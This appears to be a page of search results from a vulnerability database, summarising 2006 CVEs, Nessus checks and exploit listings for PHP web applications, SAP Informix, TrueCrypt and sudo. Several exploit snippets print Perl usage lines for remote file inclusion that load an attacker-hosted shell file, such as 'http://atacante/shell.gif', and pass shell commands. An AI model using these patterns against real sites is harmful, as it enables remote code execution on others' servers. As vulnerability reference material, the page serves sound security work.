
9470 matches found

Prion
added 2006/05/23 10:6 a.m., 9 views

Design/Logic Flaw

Unspecified vulnerability in the sapdba command in SAP with Informix before 700, and 700 up to patch 100, allows local users to execute arbitrary commands via unknown vectors related to "insecure environment variable" handling...

10 CVSS, 7.7 AI score, 0.01521 EPSS
Exploits 0, References 9

Cvelist
added 2006/05/23 10:0 a.m., 15 views

CVE-2006-2547

Unspecified vulnerability in the sapdba command in SAP with Informix before 700, and 700 up to patch 100, allows local users to execute arbitrary commands via unknown vectors related to "insecure environment variable" handling...

7.2 AI score, 0.01521 EPSS
Exploits 0, References 9

CVE
added 2006/05/23 10:0 a.m., 39 views

CVE-2006-2547

CVE-2006-2547 affects SAP with Informix, specifically the sapdba command. The vulnerability arises from insecure environment variable handling, enabling local users to run arbitrary commands via unknown vectors. Affected scope is SAP Informix deployments before version 700 and 700 up to patch 100...

10 CVSS, 7.2 AI score, 0.01521 EPSS
Exploits 0, References 9, Affected Software 1

Tenable Nessus
added 2006/05/23 12:0 a.m., 45 views

XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion

The version of XOOPS installed on the remote host allows an unauthenticated attacker to skip processing of the application's 'include/common.php' script and thereby to gain control of the variables '$xoopsConfiglanguage' and '$xoopsConfigthemeset', which are used by various scripts to include PHP...

5.1 CVSS, 6.2 AI score, 0.05235 EPSS
Exploits 1, References 2

Prion
added 2006/05/20 3:2 a.m., 13 views

Code injection

Invision Power Board (IPB) before 2.1.6 allows remote attackers to execute arbitrary PHP script via attack vectors involving (1) the posticon variable in classes/post/classpost.php and (2) the df value in actionpublic/moderate.php...

6.4 CVSS, 7.9 AI score, 0.01059 EPSS
Exploits 0, References 9, Affected Software 1

Prion
added 2006/05/19 11:2 p.m., 15 views

Cross site scripting

Cross-site scripting (XSS) vulnerability in (1) index.php and (2) bmc/admin.php in BoastMachine bMachine 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly filtered when it is accessed using the $_SERVER["PHP_SELF"] variable...

6.8 CVSS, 6.2 AI score, 0.10962 EPSS
Exploits 1, References 9, Affected Software 1

Prion
added 2006/05/19 11:2 p.m., 12 views

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in ScozNews 1.2.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONFIGmainpath parameter in (1) functions.php, (2) template.php, (3) news.php, (4) help.php, (5) mail.php, (6) Admin/admincats.php, (8) Admin/adminedit.php, (9)...

7.5 CVSS, 8.1 AI score, 0.17062 EPSS
Exploits 1, References 9, Affected Software 1

Cvelist
added 2006/05/19 11:0 p.m., 12 views

CVE-2006-2487

Multiple PHP remote file inclusion vulnerabilities in ScozNews 1.2.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONFIGmainpath parameter in (1) functions.php, (2) template.php, (3) news.php, (4) help.php, (5) mail.php, (6) Admin/admincats.php, (8) Admin/adminedit.php, (9)...

7.6 AI score, 0.17062 EPSS
Exploits 1, References 9

Tenable Nessus
added 2006/05/13 12:0 a.m., 49 views

FreeBSD : sudo -- arbitrary command execution (1b725079-9ef6-11da-b410-000e0c2e438a)

Tavis Ormandy reports: The bash shell uses the value of the PS4 environment variable after expansion as a prefix for commands run in execution trace mode. Execution trace mode (xtrace) is normally set via bash's -x command line option or interactively by running 'set -o xtrace'. However, it may al...

4.6 CVSS, 5.8 AI score, 0.00128 EPSS
Exploits 2, References 3

Tenable Nessus
added 2006/05/13 12:0 a.m., 26 views

FreeBSD : squirrelmail -- _$POST variable handling allows for various attacks (7d52081f-2795-11da-bc01-000e0c2e438a)

A Squirrelmail Advisory reports: An extract($_POST) was done in optionsidentities.php which allowed for an attacker to set random variables in that file. This could lead to the reading and possible writing of other people's preferences, cross site scripting or writing files in webserver-writable...

4.3 CVSS, 5.2 AI score, 0.1115 EPSS
Exploits 2, References 3

0day.today
added 2006/05/08 12:0 a.m., 52 views

Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit

Exploit for unknown platform in category web applications. Dokeos LMS usage: perl own.pl perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://www.dokeos.com/ T...

7.1 AI score
Exploits 0

seebug.org
added 2006/05/08 12:0 a.m., 22 views

Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl Dokeos Learning Management System 1.6.4 Remote File Include Exploit & Advisorie: beford xbefordx gmail com uso: perl own.pl host cmd-shell-url cmd-var perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: ? system$cm...

7.1 AI score
Exploits 0

Exploit DB
added 2006/05/05 12:0 a.m., 33 views

StatIt 4 - 'statitpath' Remote File Inclusion

!/usr/bin/perl Statit V4 Remote File Inclusion exploit Bug discovered By IGNOR3 [email protected] http://www.smart-boys.com Google Search=inurl:statit.php usage: perl statit.pl perl statit.pl http://target.com/statit/ http://www.golha.net/ignor3/shell.txt cmd cmd shell example: cmd shell...

7.4 AI score
Exploits 0

NVD
added 2006/05/04 12:38 p.m., 8 views

CVE-2006-2183

Untrusted search path vulnerability in Truecrypt 4.1, when running suid root on Linux, allows local users to execute arbitrary commands and gain privileges via a modified PATH environment variable that references a malicious mount command...

7.2 CVSS, 7.4 AI score, 0.00086 EPSS
Exploits 1, References 6

CVE
added 2006/05/04 10:0 a.m., 35 views

CVE-2006-2183

CVE-2006-2183 affects TrueCrypt 4.1 on Linux when running as a set-user-ID root process. The vulnerability arises from an untrusted search path: a modified PATH environment variable referencing a malicious mount command could allow local users to execute arbitrary commands and gain privileges. Th...

7.2 CVSS, 7.4 AI score, 0.00086 EPSS
Exploits 1, References 6, Affected Software 1

Exploit DB
added 2006/05/04 12:0 a.m., 112 views

Auction 1.3m - 'phpbb_root_path' Remote File Inclusion

!/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path =...

7.4 AI score
Exploits 0

Prion
added 2006/05/03 10:2 a.m., 18 views

Remote file inclusion

Dynamic variable evaluation vulnerability in index.php in Stadtaus Guestbook Script 1.7 and earlier, when register_globals is enabled, allows remote attackers to modify arbitrary program variables via parameters, which are evaluated as PHP variable variables, as demonstrated by performing PHP remo...

6.4 CVSS, 7.1 AI score, 0.00596 EPSS
Exploits 0, References 6, Affected Software 1

Cvelist
added 2006/05/03 10:0 a.m., 11 views

CVE-2006-2158

Dynamic variable evaluation vulnerability in index.php in Stadtaus Guestbook Script 1.7 and earlier, when register_globals is enabled, allows remote attackers to modify arbitrary program variables via parameters, which are evaluated as PHP variable variables, as demonstrated by performing PHP remo...

6.9 AI score, 0.00596 EPSS
Exploits 0, References 6

0day.today
added 2006/04/28 12:0 a.m., 78 views

Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit

Exploit for unknown platform in category web applications. Advanced GuestBook if @ARGV ne 3 else sub header print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; print "+ Advanced GuestBook for...

7.1 AI score
Exploits 0

Prion
added 2006/04/20 6:6 p.m., 16 views

Design/Logic Flaw

DbbS 2.0-alpha and earlier allows remote attackers to obtain sensitive information via an invalid (1) fcategoryid parameter to topics.php or (2) unavariabile, (3) GLOBALS, or (4) SERVER parameters to script.php. NOTE: this information leak might be resultant from a global variable overwrite issue...

5 CVSS, 6.7 AI score, 0.00391 EPSS
Exploits 0, References 3, Affected Software 1